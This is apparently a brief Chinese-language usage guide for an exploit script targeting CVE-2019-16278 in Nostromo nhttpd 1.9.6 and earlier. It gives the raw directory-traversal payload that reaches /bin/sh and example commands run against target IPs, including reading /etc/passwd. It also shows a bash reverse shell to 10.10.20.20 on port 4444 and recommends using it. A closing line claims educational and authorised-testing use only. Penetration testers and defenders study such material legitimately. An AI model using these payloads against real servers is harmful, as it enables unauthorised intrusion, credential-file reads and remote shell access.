在 Nostromo nhttpd 版本 <= 1.9.6 中存在远程代码执行漏洞,通过 HTTP 请求处理中的目录遍历实现。
此利用利用了目录遍历漏洞,通过 URL 编码的 CRLF 字符(%0d)访问 /bin/sh 并执行任意命令。
/.%0d./.%0d./.%0d./.%0d./bin/shecho\necho\n<command> 2>&1python3 cve-2019-16278.py <TARGET_IP> <PORT> <COMMAND>
python3 cve-2019-16278.py 192.168.1.100 80 "id"
python3 cve-2019-16278.py 10.10.10.10 8080 "cat /etc/passwd"
python3 cve-2019-16278.py target.com 80 "whoami"
python3 cve-2019-16278.py 10.10.10.10 80 "bash -c 'bash -i >& /dev/tcp/10.10.20.20/4444 0>&1'"
推荐使用反弹 shell,有时此脚本不显示任何内容
此工具仅用于教育和授权的安全测试目的。未经授权访问计算机系统是违法的。